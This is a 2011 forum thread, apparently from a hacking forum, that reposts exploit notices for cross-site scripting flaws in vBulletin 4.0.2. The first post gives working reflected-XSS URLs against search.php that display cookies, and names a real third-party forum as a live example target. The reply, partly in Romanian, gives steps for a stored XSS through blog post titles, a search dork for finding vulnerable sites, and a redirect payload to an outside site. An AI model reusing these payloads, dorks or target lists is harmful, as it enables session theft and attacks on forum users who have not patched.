Gabriel87 Posted February 6, 2011 Report Posted February 6, 2011 (edited) Exploit Code : # SecurityReason Note :# Fix : http://www.vbulletin.com/forum/showthread.php?346486-Security-Fix-Releases-3.7.7-and-4.0.2-PL-2[+] Vbulletin 4.0.2 XSS Vulnerability1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 10 [+] Site : Inj3ct0r.com 01 [+] Support e-mail : submit[at]inj3ct0r.com 10 01 ###################################### 10 I'm 5ubzer0 member from Inj3ct0r Team 11 ###################################### 00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1[+] Discovered By: 5ubzer0[+] My id : http://inj3ct0r.com/author/2307[+] Original : http://inj3ct0r.com/exploits/9697# Version: Vbulletin 4.0.2www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>Exemple:http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E# ~ - [ [ : Inj3ct0r : ] ] Edited February 6, 2011 by Nytro Quote
Nytro Posted February 6, 2011 Report Posted February 6, 2011 Nu stiu cat de adevarat e ca a fost gasit de cineva de la Inj3ct0r... A gasit cineva un forum <= 4.02 ?Si am mai vazut si asta:Vbulletin Blog 4.0.2 XSS VulnerabilityAuthor: FormatXformatVersion: Vbulletin 4.0.2Dork: Powered by vBulletin™ Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.The script is affected by Permanent XSS vulnerability, so you can put in bad java script code<script>alert('put this script in title')</script><meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>1st registerGo to Blogs pageCreate New PostInject your java script into Title BoxYou must go back to Main page to see this XSS effect.Greets: Neo, Sa3id, All Tkurd.net MembersSursa: Vbulletin Blog 4.0.2 Title XSS Vulnerability Quote